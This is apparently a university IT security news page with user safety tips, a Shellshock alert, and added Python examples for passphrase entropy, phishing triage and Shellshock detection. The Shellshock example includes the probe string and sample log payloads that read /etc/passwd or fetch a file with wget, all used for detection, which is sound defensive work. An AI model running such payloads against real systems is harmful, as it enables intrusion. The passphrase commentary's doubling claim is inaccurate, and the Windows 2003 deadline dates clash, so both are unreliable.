  • Keep a clean machine. Make sure all software on Internet-connected devices — including PCs, laptops, smartphones, and tablets — are updated regularly to reduce the risk of malware infection.
  • Personal information is like money. Value it. Protect it. Information about you, such as purchase history or location, has value — just like money. Be thoughtful about who receives that information and how it’s collected by apps or websites.
  • When in doubt, throw it out. Cybercriminals often use links to try to steal your personal information. Even if you know the source, if something looks suspicious, delete it.
  • Share with care. Think before posting about yourself and others online. Consider what a post reveals, who might see it, and how it could be perceived now and in the future.
  • Own your online presence. Set the privacy and security settings on websites to your comfort level for information sharing. It’s okay to limit how and with whom you share information.


May 2017: BU Information Security Spring Shredding Event

IS&T is happy to announce we will be hosting a “Spring Cleaning” shredding event. Similar to the event we host each October, you will be able to bring bulk amounts of paper to be shredded at the dates and locations below. The Sustainability Office will also be on hand to receive recyclable materials. (batteries, toner, electronics, lightbulbs, etc)

The upcoming Spring Shredding Event days are currently scheduled as follows:

  • Tuesday, 5/2 from 10:00-11:30 – In the Granby St. Parking Lot (CRC East: 665 Commonwealth Ave)
  • Tuesday, 5/2 from 11:45-1:15– In the parking lot behind Agganis Arena (CRC West: 925 Commonwealth Ave)
  • Wednesday, 5/3 from 11:00-2:00 – In front of the Talbot Building (BUMC: 715 Albany Street)

May 2017: Step Up to Stronger Passwords

Weak and reused passwords continue to be a common entry point for account or identity takeover and network intrusions. Simple steps and tools exist to help your end users achieve unique, strong passwords for their dozens of accounts.

A password is often all that stands between you and sensitive data. It’s also often all that stands between a cybercriminal and your account. Below are tips to help you create stronger passwords, manage them more easily, and take one further step to protect against account theft.

  • Always: Use a unique password for each account so one compromised password does not put all of your accounts at risk of takeover.
  • Good: A good password is 10 or more characters in length, with a combination of uppercase and lowercase letters, plus numbers and/or symbols — such as pAMPh$3let. Complex passwords can be challenging to remember for even one site, let alone using multiple passwords for multiple sites; strong passwords are also difficult to type on a smartphone keyboard (for an easy password management option, see “best” below).
  • Better: A passphrase uses a combination of words to achieve a length of 20 or more characters. That additional length makes it exponentially harder for hackers to crack, yet a passphrase is easier for you to remember and more natural to type. To create a passphrase, generate four or more random words from a dictionary (let a tool pick them; words you choose yourself are far more guessable), mix in uppercase letters, and add a number or symbol to make it even stronger — such as rubbishconsiderGREENSwim$3. You’ll still find it challenging to remember multiple passphrases, though, so read on.
  • Best: The strongest passwords are created by password managers — software that generates and keeps track of complex and unique passwords for all of your accounts. All you need to remember is one complex password or passphrase to access your password manager. With a password manager, you can look up passwords when you need them, copy and paste from the vault, or use functionality within the software to log you in automatically. Best practice is to add two-step verification to your password manager account. Keep reading!
  • Step it up! When you use two-step verification (a.k.a., two-factor authentication or login approval), a stolen password doesn’t result in a stolen account. Anytime your account is logged into from a new device, you receive an authorization check on your smartphone or other registered device. Without that second piece, a password thief can’t get into your account. It’s the single best way to protect your account from cybercriminals.
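To make the “good / better / best” comparison concrete, here is a small added example (not from the original newsletter) that generates a passphrase with the operating system’s cryptographic random source and computes how large each search space is. The miniature word list is constructed for the example; the 7776-word list size, the attacker rate of 10 billion guesses per second and the 95-character printable alphabet are assumptions used only for the arithmetic.

```python
import math
import secrets

# Constructed miniature word list. A real generator uses a large published list;
# EFF_LIST_SIZE below assumes the 7776-word size of such a list.
SAMPLE_WORDS = ("rubbish", "consider", "green", "swim", "lantern", "pebble",
                "orbit", "canyon", "velvet", "tundra", "copper", "meadow",
                "saddle", "quartz", "hollow", "ember")
EFF_LIST_SIZE = 7776
PRINTABLE_ASCII = 95          # assumed alphabet for a "complex" random password


def search_space_bits(alphabet_size, length):
    """Entropy in bits of `length` symbols chosen uniformly from `alphabet_size`."""
    return length * math.log2(alphabet_size)


def passphrase_bits(word_count, wordlist_size=EFF_LIST_SIZE):
    """Entropy of `word_count` words drawn uniformly, with replacement, from the list.
    This figure only holds when a random process picks the words, not a person."""
    return word_count * math.log2(wordlist_size)


def years_to_exhaust(bits, guesses_per_second=1e10):
    """Years an offline attacker at the assumed rate needs to try every candidate."""
    return 2 ** bits / guesses_per_second / (365 * 24 * 3600)


def generate_passphrase(words=SAMPLE_WORDS, count=4, separator="-"):
    """Pick words with the OS CSPRNG (secrets), never the predictable random module."""
    return separator.join(secrets.choice(words) for _ in range(count))


def compare():
    """Return {label: (bits, years)} for the page's three password styles."""
    rows = {
        "10 random printable characters": search_space_bits(PRINTABLE_ASCII, 10),
        "4 random words (7776-word list)": passphrase_bits(4),
        "6 random words (7776-word list)": passphrase_bits(6),
        "20 random lowercase letters": search_space_bits(26, 20),
    }
    return {label: (round(bits, 1), years_to_exhaust(bits)) for label, bits in rows.items()}


if __name__ == "__main__":
    print("example passphrase:", generate_passphrase())
    for label, (bits, years) in compare().items():
        print(f"{label:32s} {bits:6.1f} bits  ~{years:.3g} years at 1e10 guesses/s")
```

Two things the numbers show that the text does not: each extra word adds the same fixed number of bits, so the search space doubles roughly every twelve characters of passphrase, and four truly random words are still weaker than ten truly random printable characters. The passphrase wins because a person can actually remember six random words, whereas “pAMPh$3let” is a dictionary word with substitutions and is nowhere near the 65 bits a uniformly random 10-character string would have.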

April 2017: Don’t Be Fooled! Protect Yourself and Your Identity

According to the US Department of Justice, more than 17 million Americans were victims of identity theft in 2014. EDUCAUSE research shows that 21 percent of respondents to the annual ECAR student study have had an online account hacked, and 14 percent have had a computer, tablet, or smartphone stolen. Online fraud is an ongoing risk. The following tips can help you prevent identity theft.

  • Read your credit card, bank, and pay statements carefully each month. Look for unusual or unexpected transactions. Remember also to review recurring bill charges and other important personal account information.
  • Review your health insurance plan statements and claims. Look for unusual or unexpected transactions.
  • Shred it! Shred any documents with personal, financial, or medical information before you throw them away.
  • Take advantage of free annual credit reports. In the US, each of the three major credit reporting agencies provides a free credit report once a year upon request.
  • If a request for your personal info doesn’t feel right, do not feel obligated to respond! Legitimate companies won’t ask for personal information such as your social security number, password, or account number in a pop-up ad, e-mail, text, or unsolicited phone call.
  • Limit the personal information you share on social media. Also, check your privacy settings every time you update an application or operating system (or at least every few months).
  • Put a password on it. Protect your online accounts and mobile devices with strong, unique passwords or passphrases.
  • Limit use of public Wi-Fi. Be careful when using free Wi-Fi, which may not be secure. Consider waiting to access online banking information or other sensitive accounts until you are at home.
  • Secure your devices. Encrypt your hard drive, use a VPN, and ensure that your systems, apps, antivirus software, and plug-ins are up-to-date.

If you become a victim of identity theft:

  • File a report with the US Federal Trade Commission at IdentityTheft.gov.
  • Use the identity theft report to file a police report. Make sure you keep a copy of both reports in a safe place.
  • Flag your credit reports by contacting the fraud departments of any one of the three major credit bureaus: Equifax (800-525-6285), Experian (888-397-3742), or TransUnion (800-680-7289).

March 2017: Security Tips for Traveling at Home and Abroad

We all like to travel with our mobile devices (smartphones, laptops, or tablets) — whether it’s to the coffee shop around the corner or to a café in Paris. These devices make it easy for us to stay connected while on the go, but they can also store a lot of information — including contacts, photos, videos, location, and other personal and financial data — about ourselves and our friends and family. Following are some ways to protect yourself and others.

Before you go:

  • If possible, do not take your work or personal devices with you on international trips. If you do, remove or encrypt any confidential data.
  • For international travel, consider using temporary devices, such as an inexpensive laptop and a prepaid cell phone purchased specifically for travel. (For business travel, your employer may have specific policies about device use and traveling abroad.)
  • Install a device finder or manager on your mobile device in case it is lost or stolen. Make sure it has remote wipe capabilities and that you know how to do a remote wipe.
  • Ensure that any device with an operating system and software is fully patched and up-to-date with security software.
  • Make copies of your travel documents and any credit cards you’re taking with you. Leave the copies with a trusted friend, in case the items are lost or stolen.
  • Keep prying eyes out! Use strong passwords, passcodes, or smart-phone touch ID to lock and protect your devices.
  • Avoid posting social media announcements about your travel plans; such announcements make you an easy target for thieves. Wait until you’re home to post your photos or share details about your trip.

While you’re there:

  • Physically protect yourself, your devices, and any identification documents (especially your passport).
  • Don’t use an ATM unless you have no other option; instead, work with a teller inside the bank. If you must use an ATM, only do so during daylight hours and ask a friend to watch your back. Also check the ATM for any skimming devices, and use your hand to cover the number pad as you enter your PIN.
  • It’s hard to resist sharing photos or telling friends and family about your adventures, but it’s best to wait to post about your trip on social media until you return home.
  • Never use the computers available in public areas, hotel business centers, or cyber cafés since they may be loaded with keyloggers and malware. If you use a device belonging to other travelers, colleagues, or friends, do not log in to e-mail or any sensitive accounts.
  • Be careful when using public wireless networks or Wi-Fi hotspots; they’re not secure, so anyone could potentially see what you’re doing on your computer or mobile device while you’re connected.
  • Disable Wi-Fi and Bluetooth when not in use. Some stores and other locations search for devices with Wi-Fi or Bluetooth enabled to track your movements when you’re within range.
  • Keep your devices with you at all times during your travels. Do not assume they will be safe in your hotel room or in a hotel safe.

When you return:

  • Change any and all passwords you may have used abroad.
  • Run full antivirus scans on your devices.
  • If you used a credit card while traveling, check your monthly statements for any discrepancies for at least one year after you return.
  • If you downloaded any apps specifically for your trip and no longer need them, be sure to delete those apps and the associated data.
  • Post all of your photos on social media and enjoy reliving the experience!

Security Tips for Smarter Travel


Don’t be duped by phishing scams

Cybercriminals know the best strategies for gaining access to your institution’s sensitive data. In most cases, it doesn’t involve them rappelling from a ceiling’s skylight and deftly avoiding a laser detection system to hack into your servers; instead, they simply manipulate a community member.

According to IBM’s 2014 Cyber Security Intelligence Index, human error is a factor in 95 percent of security incidents. Following are a few ways to identify various types of social engineering attacks and their telltale signs.

  • Phishing isn’t relegated to just e-mail! Cybercriminals will also launch phishing attacks through phone calls, text messages, or other online messaging applications. Don’t know the sender or caller? Seem too good to be true? It’s probably a phishing attack.
  • Know the signs. Does the e-mail contain a vague salutation, spelling or grammatical errors, an urgent request, and/or an offer that seems impossibly good? Click that delete button.
  • Verify the sender. Check the sender’s e-mail address to make sure it’s legitimate. If it appears that your institution’s help desk is asking you to click on a link to increase your mailbox quota, but the sender is “UniversityHelpDesk@yahoo.com,” it’s a phishing message.
  • Don’t be duped by aesthetics. Phishing e-mails often contain convincing logos, links to actual company websites, legitimate phone numbers, and e-mail signatures of actual employees. However, if the message is urging you to take action — especially action such as sending sensitive information, clicking on a link, or downloading an attachment — exercise caution and look for other telltale signs of phishing attacks. Don’t hesitate to contact the company directly; they can verify legitimacy and may not even be aware that their name is being used for fraud.
  • Never, ever share your password. Did we say never? Yup, we mean never. Your password is the key to your identity, your data, and your classmates’ and colleagues’ data. It is for your eyes only. Your institution’s help desk or IT department will never ask you for your password.
  • Avoid opening links and attachments from unknown senders. Get into the habit of typing known URLs into your browser. Don’t open attachments unless you’re expecting a file from someone. Give them a call if you’re suspicious.
  • When you’re not sure, call to verify. Let’s say you receive an e-mail claiming to be from someone you know — a friend, colleague, or even the president of your college or university. Cybercriminals often spoof addresses to convince you, then request that you perform an action such as transfer funds or provide sensitive information. If something seems off about the e-mail, call them at a known number listed in your institution’s directory to confirm the request.
  • Don’t talk to strangers! Receive a call from someone you don’t know? Are they asking you to provide information or making odd requests? Hang up the phone and report it to the help desk.
  • Don’t be tempted by abandoned flash drives. Cybercriminals may leave flash drives lying around for victims to pick up and insert, thereby unknowingly installing malware on their computers. You might be tempted to insert a flash drive only to find out the rightful owner, but be wary — it could be a trap.
  • See someone suspicious? Say something. If you notice someone suspicious walking around or “tailgating” someone else, especially in an off-limits area, call campus safety.
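The checks above (a sender whose display name claims the institution but whose address is elsewhere, a look-alike domain, an urgent request, a vague salutation, a request for credentials) can be turned into a small triage script. This is an added example, not code from the original page or from BU’s IS&T; the trusted domain bu.edu, the display-name keywords and the regular expressions are assumptions you would tune for your own institution, and the two sample messages are constructed.

```python
import re
from email.utils import parseaddr

# Domains the institution really sends from. Assumed for this example.
TRUSTED_DOMAINS = {"bu.edu"}

# Display-name phrases that claim to be the institution or its help desk (assumed list).
INSTITUTION_CLAIMS = ("help desk", "helpdesk", "it support", "it department",
                      "boston university")

URGENCY = re.compile(
    r"\b(urgent|immediately|within \d+ hours|will be (suspended|closed|deleted))\b", re.I)
VAGUE_SALUTATION = re.compile(
    r"\bdear (user|customer|member|account holder|valued)\b", re.I)
CREDENTIAL_REQUEST = re.compile(
    r"\b(verify|confirm|enter|provide) your (password|account|login|ssn|social security number)\b",
    re.I)
URL_HOST = re.compile(r"https?://([^/\s:]+)", re.I)


def sender_domain(from_header):
    """Domain of the real address in a From: header, ignoring the display name."""
    _name, addr = parseaddr(from_header)
    return addr.rpartition("@")[2].lower()


def is_trusted(domain):
    return any(domain == t or domain.endswith("." + t) for t in TRUSTED_DOMAINS)


def is_lookalike(domain):
    """True for domains that embed a trusted name without being it, e.g. bu-edu-quota.com."""
    if not domain or is_trusted(domain):
        return False
    squashed = domain.replace(".", "").replace("-", "")
    return any(t.replace(".", "") in squashed for t in TRUSTED_DOMAINS)


def phishing_indicators(msg):
    """Return the telltale signs found in a message given as a dict with from/subject/body."""
    signs = []
    from_header = msg["from"]
    display_name = parseaddr(from_header)[0].lower()
    domain = sender_domain(from_header)

    if any(claim in display_name for claim in INSTITUTION_CLAIMS) and not is_trusted(domain):
        signs.append("display name claims the institution but address is @" + domain)
    if is_lookalike(domain):
        signs.append("look-alike sender domain " + domain)

    text = msg["subject"] + "\n" + msg["body"]
    for host in URL_HOST.findall(text):
        if is_lookalike(host.lower()):
            signs.append("link to look-alike domain " + host)
    if URGENCY.search(text):
        signs.append("urgent request")
    if VAGUE_SALUTATION.search(text):
        signs.append("vague salutation")
    if CREDENTIAL_REQUEST.search(text):
        signs.append("asks for credentials")
    return signs


def is_probable_phish(msg, threshold=2):
    """Two or more indicators together are treated as a phish; one alone is only a warning."""
    return len(phishing_indicators(msg)) >= threshold


# Constructed sample messages, not real mail.
PHISH = {
    "from": "BU Help Desk <UniversityHelpDesk@yahoo.com>",
    "subject": "URGENT: mailbox quota exceeded",
    "body": ("Dear User,\nYour mailbox is full. Click http://bu-edu-quota.com/verify "
             "within 24 hours and verify your password or your account will be suspended."),
}
LEGIT = {
    "from": "IT Help Center <ithelp@bu.edu>",
    "subject": "Scheduled maintenance on Saturday",
    "body": "Hi Jane,\nEmail will be unavailable Saturday 6-8 am. Details: https://www.bu.edu/tech/",
}

if __name__ == "__main__":
    for label, message in (("phish", PHISH), ("legit", LEGIT)):
        print(label, is_probable_phish(message), phishing_indicators(message))
```

The sender check deliberately parses the address with parseaddr rather than eyeballing the display name, because the display name is the part the attacker controls completely; and no single indicator decides, since a legitimate outage notice can be urgent and a real help desk can say “Dear user”.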

Data Privacy Day – January 28, 2017

January 28th is the international Data Privacy Day. Learn how to change your privacy and security settings, and read more about safeguarding your digital presence, here.


Action Required before May 15 – Windows 2003 Server support ending

May 19th, 2015

The date for the end of support for Windows 2003 servers is fast approaching—only 3 months away.  It is crucial that we have these systems remediated before the July 14 deadline.  When Microsoft stopped supporting XP, the bad guys stock-piled all their zero-day exploits for an entire year beforehand, just waiting for that day when they could compromise any XP machine and not have to worry about having a security patch kick them out.  You can be sure they are doing the same for 2003.

I’m hoping that you have identified any of your servers still using Windows 2003, and have already begun to remediate them.

Here is a link to Microsoft’s information regarding end of support including Microsoft migration options:  http://www.microsoft.com/en-us/server-cloud/products/windows-server-2003/.

From a security perspective, here are some of the remediation options we recommend:

  • If the server is no longer needed, or after the server has been remediated:
    o Please SEND an email to Systems Administration (ist-sa@bu.edu) with the name of the server and whether it is currently a physical or virtual machine.
    o Include instructions for WHEN it can be powered down, disabled in AD, and deleted (VM).
  • If currently a physical machine:
    o Request a new VM with a fresh install of Windows 2012 R2.
    o Upgrade to a supported OS on the same machine.
    o Do a fresh install of a supported OS on a new physical machine.
  • If currently a virtual machine:
    o Update the software to a supported version on the same VM.
    o Request a new VM and do a fresh install of a supported OS.

If you are requesting a new VM or additional resources for an existing VM, Systems Administration needs to know your requirements (CPU, memory, disk) immediately.  I strongly encourage you to reach out as soon as possible as the end of support is quickly approaching.

As you plan to remediate each of your servers, please keep IS&T informed by sending your remediation plans to Systems Administration.   If you have any questions or concerns about remediation options, please contact Gerard Shockley directly.



Tax Fraud Advisory

April 14th, 2015

During this 2015 tax season, taxpayers should prepare for heightened risks and be vigilant to tax fraud.

Read REN-ISAC’s advisory



Facebook is Changing Their Privacy Policy

December 19th, 2014

Facebook is changing their privacy policy allowing themselves unrestricted access to share your location information with advertisers (details: https://www.facebook.com/about/privacy/update). For those of you that are privacy-minded, there are a couple of things you can do:

[1] Review the Facebook Privacy basics (https://www.facebook.com/settings/?tab=privacy). There are some good things here that you should know and decide about. In fact, go through everything in the Settings section and update it to your preference. Note however that you have no control of what information that Facebook shares with advertisers, so we have to take things out of their hand to the extent we can:

[2] We can applaud advertising companies that are willing to offer and respect our choices around security and privacy. These companies have joined an opt-out program allowing you to ask not to be tracked. The link for it is http://www.aboutads.info/choices/ and is below. This works by setting a cookie on your system with your do-not-track preference, so you will need to allow a third party cookie to be set for this site. Also, you will need to run this on each browser and each device you use.

But you can be guaranteed that many (most?) advertising companies will continue to disregard our choices and preferences, so there is a second thing you can do which I think is particularly important on smartphones:

[3] Disable Location Services for Facebook and your web browser.
● On the iPhone, it is Settings > Privacy > Location Services > then set Facebook and Safari to “Never”
● Androids are all a little different, so you will need to look it up for your model phone.



Boston University Receives Security Innovation Award from CSO Magazine

October 31st, 2014

IS&T to be Recognized at the CSO50 Security Awards Conference

Boston, MA – October 2, 2014 – Boston University’s Information Services and Technology Department (IS&T) has been named a recipient of a 2015 CSO50 Award from IDG’s CSO Magazine (International Data Group’s Chief Security Officer Magazine). This prestigious honor is bestowed upon a select group of organizations that have demonstrated how their security initiatives and innovations have created outstanding business value and thought leadership for their companies and the information security industry.

Quinn Shamblin, BU Information Security Officer, explains the goals of the project, “From researchers working with protected health information to University administration working with financial numbers and business strategy to the business offices dealing with credit card transactions—many organizations and groups within a University have need for secure servers on which to conduct business using information protected by State and Federal law and regulation.  In multi-tenant environments without purpose-crafted security controls, information and resources are often accessed by more than one tenant and regulated information may be at risk through shared memory attacks and other mechanisms.”

“BU Information Security and IS&T Systems Engineering worked together to create the ‘Premium Secure VM’ service, which leverages VMware and other tools to provide the security required to handle our most sensitive information in a virtual environment.  This allows us to move away from standalone physical servers for these kinds of workloads, taking advantage of the economies of scale, natural system lifecycle management, and the reduced environmental impact offered by a virtual hosted server environment.”

“The architecture was a result of a close collaboration between Systems Engineering staff and Senior Information Security Administrator Tammy Pruneau,” explains Josie DeBaere, the Director of Systems Engineering. “Based on Tammy’s requirements, Systems Architects and Engineers designed and then deployed a new virtual environment that uses advanced components of the VMware vCloud Suite to provide the additional controls required for compliance.”

The solution was designed to meet the requirements of a wide variety of sensitive information: HIPAA, GLBA Financial, PCI, PII, ePHI, and data protected by Massachusetts General Law. “My focus was working through the myriad of laws and regulations to define one cohesive superset of security requirements. I leveraged that research and my experience with a precursor to vSphere called ConfigureSoft to work with Engineering on the project,” says Tammy.

Nik Conwell, Manager of Systems Engineering reports significant benefits: he projects savings of $1000 on acquisition costs and $1000/year on power per system brought into the environment. In 6 months of operation, 48 systems were virtualized and the Server Administrators continue to bring new servers into the environment.

“Tracy Schroeder, VP of Information Services & Technology (IS&T), provided very visible support for this effort, something we deeply appreciate,” says Shamblin.

“For the third year in a row, outstanding organizations demonstrating innovation, creativity and understanding of business value in security were chosen from a large pool of submissions.” said Joan Goodchild, editor, CSO. “We congratulate this year’s CSO50 winners and applaud them for setting the bar high for security’s role in providing value and ROI in business.”

In recognizing a select group of organizations for security projects and initiatives that demonstrate outstanding business value, the CSO50 Awards are scored according to a uniform set of criteria by a panel of judges that includes security leaders, industry experts, and academics.

Quinn, Tammy and Nik will accept the award at the CSO50 Security Confab + Awards conference held on February 23-25, 2015 at the Omni Amelia Island Plantation, Amelia Island, Florida.

About the CSO50 Awards

Launched in 2013, the CSO50 Awards recognize 50 organizations for security projects and initiatives that demonstrate outstanding business value and thought leadership. The CSO50 Awards are scored according to a uniform set of criteria by a panel of judges that includes security leaders, industry experts, and academics. Awards will be presented at the CSO50 Security Confab + Awards conference.

About CSO

CSO (Chief Security Officer) is the premier content and community resource for security decision-makers who lead “business risk management” efforts within their organization.  For more than a decade, CSO’s award-winning website (CSOonline.com), executive conferences, strategic marketing services and research have equipped security decision-makers to mitigate both IT and corporate/physical risk for their organizations and provided opportunities for security vendors looking to reach this audience. To assist CSOs in educating their organizations’ employees on corporate and personal security practices, CSO also produces the quarterly newsletter Security Smart. CSO is published by IDG Enterprise, a subsidiary of International Data Group (IDG), the world’s leading media, events and research company. Company information is available at www.idgenterprise.com.

About Boston University

Boston University (BU) is the fourth-largest private university in the U.S., with over 33,000 undergraduate and graduate students from more than 130 countries, nearly 10,000 faculty and staff, 16 schools and colleges, and 250 fields of study. It is an internationally recognized institution of higher education and research and has one of the largest populations of international students of any U.S. university. In 2013, BU was ranked 41st in the nation by U.S. News & World Report and 50th in the world (Times Higher Education).

Information Services and Technology, headed by VP Tracy Schroeder, is Boston University’s central IT organization and includes BU Information Security, headed by Executive Director & BU Information Security Officer Quinn R. Shamblin, and Systems Engineering, headed by Director Josie DeBaere.

Beginning Tuesday, October 14, all Boston University employees will be automatically enrolled in Duo Security for the BUworks Central Portal.

October 9th, 2014

Information Services & Technology now provides high-security protection for your pay statements and benefits information on the BUworks Central Portal!

On Tuesday, October 14, all employees will be automatically enrolled in Duo Security for the BUworks Central Portal at www.bu.edu/buworkscentral. Users will be prompted to enroll a device in Duo the first time they attempt to log in on or after October 14.

This new, high-security login process asks individuals logging in to confirm their identity using a smartphone app, via text message to a device, via automated calls to a mobile or landline phone, or using a secured kiosk (for certain staff).

You can learn more about the new login process and find setup instructions for Duo Security at www.bu.edu/tech/duo. For people who log in to BUworks frequently, we recommend the option to “remember this device for 30 days”, which reduces the number of times you’ll need to confirm your identity when using the same computer and browser.

If you have any questions or concerns, please contact the IT Help Center online, via email at ithelp@bu.edu, or by phone at (617) 353-HELP (4357).

Boston University Information Services & Technology
IT Help Center
ithelp@bu.edu
617-353-HELP(4357)
www.bu.edu/tech

Using Bash? Learn more about the ‘Shellshock’ vulnerability

September 26th, 2014

There has been a lot published about the “Shellshock” vulnerability reported by Stephane Chazelas and disclosed publicly earlier this week. Shellshock lets anyone who can get a crafted environment variable passed to Bash (for example through a CGI web script, a DHCP client, or a restricted SSH login) execute arbitrary commands with the privileges of the process that called Bash; when that process runs as root, the attacker gets root. It grants very high levels of access and is very easy to exploit.

This is a serious vulnerability that may affect Mac OS X if you have changed it from its default settings; unfortunately Apple has not yet provided details as to which changes make a Mac vulnerable. If you have not changed your Mac from its default settings, you are likely not vulnerable, but regardless, accept the update when Apple releases it.

Shellshock also affects many Linux/Unix systems. System administrators throughout BU are already working to update BU systems to protect against this issue, but those of you who privately run or administer any Linux/Unix system that uses the Bash shell should read up on CVE-2014-6271 and patch your systems immediately.

For more details see: http://www.bu.edu/infosec/2014/09/26/gnu-bourne-again-shell-bash-shellshock-vulnerability/

GNU Bourne Again Shell (Bash) ‘Shellshock’ Vulnerability

September 26th, 2014 in Security Alerts for BU

National Cyber Awareness System:

TA14-268A: GNU Bourne Again Shell (Bash) ‘Shellshock’ Vulnerability (CVE-2014-6271, CVE-2014-7169)

09/25/2014 12:56 PM EDT

Original release date: September 25, 2014

Systems Affected

  • GNU Bash through 4.3.
  • Linux, BSD, and UNIX distributions including but not limited to:
    • CentOS 5 through 7
    • Debian
    • Mac OS X
    • Red Hat Enterprise Linux 4 through 7
    • Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS

Overview

A critical vulnerability has been reported in the GNU Bourne Again Shell (Bash), the common command-line shell used in most Linux/UNIX operating systems and Apple’s Mac OS X. The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables used by the operating system [1]. The United States Department of Homeland Security (DHS) is releasing this Technical Alert to provide further information about the GNU Bash vulnerability.

Description

GNU Bash versions 1.14 through 4.3 contain a flaw in the way they import function definitions from environment variables: commands placed after the function definition in the variable's value are executed when the shell starts. An attacker who can supply a crafted environment variable to a process that invokes Bash can therefore execute arbitrary code, and because many network services pass client-supplied data to Bash through the environment, this enables network-based exploitation. [2, 3]

Critical instances where the vulnerability may be exposed include: [4, 5]

  • Apache HTTP Server using mod_cgi or mod_cgid, when the CGI scripts are written in Bash or spawn subshells.
  • Override or bypass of the ForceCommand feature in OpenSSH sshd, and of the limited protection some Git and Subversion deployments use to restrict shells, allowing arbitrary command execution.
  • Arbitrary commands run on a DHCP client machine, and in various daemons and SUID/privileged programs.
  • Exploitation of servers and other Unix and Linux devices via web requests, secure shell, telnet sessions, or other programs that use Bash to execute scripts.
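
The mechanism described above (and in the BU post that precedes this alert) can be both checked for and watched for with a few lines of code. The following is an added example, not part of the US-CERT alert and not BU's own tooling: `check_bash` passes the widely published CVE-2014-6271 probe string to a Bash binary through its environment, the way mod_cgi hands HTTP headers to a script, and reports whether the trailing command ran; `find_shellshock_attempts` scans Apache-style access-log lines for the `() {` prefix that an exploit attempt must place in a header or request field. The log lines are constructed for the example, and the function names and the `SHELLSHOCK_PROBE` variable name are this example's own choices.

```python
import os
import re
import subprocess

# Published CVE-2014-6271 probe: an exported-function definition followed by a
# trailing command.  A vulnerable Bash executes the trailing command while
# importing the variable; a patched Bash stops parsing at the closing brace.
PROBE = "() { :;}; echo SHELLSHOCK_VULNERABLE"

# Every exploit attempt has to start the variable value with "() {", whatever
# whitespace or payload follows, so that prefix is the detection signature.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def check_bash(bash="bash"):
    """Return 'vulnerable', 'patched' or 'absent' for the given Bash binary.

    The probe is added to the normal environment under a variable name chosen
    for this example, mirroring how a CGI server exports HTTP_USER_AGENT and
    similar headers before exec'ing a script.  Only stdout is inspected.
    """
    env = dict(os.environ, SHELLSHOCK_PROBE=PROBE)
    try:
        proc = subprocess.run([bash, "-c", "echo probe-done"], env=env,
                              capture_output=True, text=True, timeout=10)
    except (FileNotFoundError, PermissionError, subprocess.TimeoutExpired):
        return "absent"
    return "vulnerable" if "SHELLSHOCK_VULNERABLE" in proc.stdout else "patched"


def find_shellshock_attempts(log_lines):
    """Return (client_ip, line) pairs for access-log lines carrying the signature.

    The whole line is searched rather than individual fields, because the
    payload can sit in the request line, the Referer or the User-Agent, and
    Apache escapes embedded quotes in a way that defeats a naive field split.
    """
    hits = []
    for line in log_lines:
        if SHELLSHOCK_RE.search(line):
            hits.append((line.split(" ", 1)[0], line))
    return hits


# Constructed sample lines in Apache combined log format; the addresses are
# documentation ranges, not real clients.  Lines 1 and 3 carry payloads in the
# User-Agent and Referer fields respectively; line 2 is ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:14:02 -0400] "GET /cgi-bin/status.sh HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/bash -c \\"cat /etc/passwd\\""',
    '198.51.100.7 - - [25/Sep/2014:10:14:09 -0400] "GET /index.html HTTP/1.1" '
    '200 2326 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [25/Sep/2014:10:15:41 -0400] "GET /cgi-bin/status.sh HTTP/1.1" '
    '200 512 "() {:;}; /usr/bin/wget http://203.0.113.5/x -O /tmp/x" "curl/7.30"',
]

if __name__ == "__main__":
    print("local bash:", check_bash())
    for ip, line in find_shellshock_attempts(SAMPLE_LOG):
        print("attempt from", ip, "->", line[:72])
```

A "patched" result from `check_bash` only means the original CVE-2014-6271 probe no longer executes; as the Solution section below says, the follow-up CVE-2014-7169 needs the vendor's updated package, so use the check to find unpatched hosts, not to declare a host clean. The log scanner is deliberately broad: a legitimate User-Agent never begins with `() {`, so every hit is worth looking at.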

Impact

This vulnerability is classified by industry standards as “High” impact with CVSS Impact Subscore 10 and “Low” on complexity, which means it takes little skill to perform. This flaw allows attackers to provide specially crafted environment variables containing arbitrary commands that can be executed on vulnerable systems. It is especially dangerous because of the prevalent use of the Bash shell and its ability to be called by an application in numerous ways.

Solution

Major Linux vendors have released patches for affected versions. The initial fixes for CVE-2014-6271 did not completely resolve the vulnerability, so install the existing patches now and watch for the updated patches that address CVE-2014-7169.

Many UNIX-like operating systems, including Linux distributions, BSD variants, and Apple Mac OS X include Bash and are likely to be affected. Contact your vendor for updated information. A list of vendors can be found in CERT Vulnerability Note VU#252743 [6].

US-CERT recommends system administrators review the vendor patches and the NIST Vulnerability Summary for CVE-2014-7169, to mitigate damage caused by the exploit.

Scams Targeting University Employees and Students

July 16th, 2014 in Security Alerts for BU

The bad guys are at it again!  Universities across the nation have been working to tighten security around employee pay and the bad guys are trying to get around the new protections.  If you see a message like the one below, it is a scam.

They will ask you directly for your bank account numbers to try to bypass the security we have put in place to keep your information safe.  If you have already responded to a message like this, you can report this cyber crime directly to the FBI at www.ic3.gov

Hello,

The University is having a salary increment program again this year with an average of 2.5%.
The Human Resources department evaluated you for a raise on your next paycheck.
Click below to confirm and access your salary revision documents:

…link removed….to access the documents

Sincerely,

Human Resources


BU is Currently Experiencing a Flood of Phishing Emails

May 29th, 2014 in Security Alerts for BU

Boston University is currently seeing a flood of phishing messages pretending to be from BU. These messages are scams. The link sends you to a web site that is not BU.EDU (you can see this for yourself if you hover your mouse over the link or, if you’re on a smartphone, press and hold until the link is displayed).

If you see this message, delete it. Do not click the link and do not log in.

————————————————————–
Sent: Thursday, May 29, 2014 7:57 AM
Subject: HELP-DESK Boston University

(IMAP) Server – requires Increase, Mailbox has exceeded its storage limit.

Click on Faculty and Staff Portal to increase

Mailbox SEND/RECEIVE Functions will be disabled if account increase is not completed.

Copyright © 2014 Staff and Faculty Mailbox Portal.


Changes to the BUworks Login Screen

May 29th, 2014 in Security Alerts for BU

Information Services & Technology is piloting a new high-security login process for viewing and editing employee information, including pay statements and benefits on the BUworks Central Portal.

On June 10th, a new login service will be released to support this pilot program. This new service will also improve the capability and reliability of Boston University web authentication.

When we release the new service on June 10th, the login screen you’re used to seeing at www.bu.edu/buworkscentral/ will change slightly. In addition, Web Login-secured applications (e.g., The Links), including those linked from BUworks Central, will require a separate login.

